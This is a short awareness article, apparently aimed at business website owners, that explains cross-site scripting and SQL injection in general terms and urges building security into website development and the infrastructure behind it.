Websites – Not as secure as you think.

Do you have a website? What do you know about cross-site scripting (XSS) or SQL injection? Not only could your website be vulnerable to defacing, but an attack may also lead to the disclosure of commercial or personal data.

One of the most common attacks used to deface or hijack Web sites is achieved through cross-site scripting (XSS) attacks. The attacker embeds malicious scripts into a site’s web pages, and when a user makes a request to the web site, the script is embedded in the response data. The client’s browser downloads the script believing it to be from a trusted site (your site) and executes it, allowing access to page-content, cookies, and other information on the client’s computer. This potentially allows not only access to client-side data, but could also provide insight as to how to launch further attacks on the website.

SQL injection is used by attackers to directly attack a website by exploiting databases behind the webpage. The attack is achieved by incorporating database commands in normal character sequences of user input fields on a webform. This user input is executed by the database resulting in unintended release of information.

These attacks not only enable phishing attacks on your customers, but could also lead to bigger attacks on the assets behind the website, allow access to sensitive business data and perhaps also personal data. Thus not only should you protect your business by incorporating security strategies into the full life-cycle of your website development, but the architecture of your IT infrastructure behind the website needs to be considered as part of your overall information security strategy.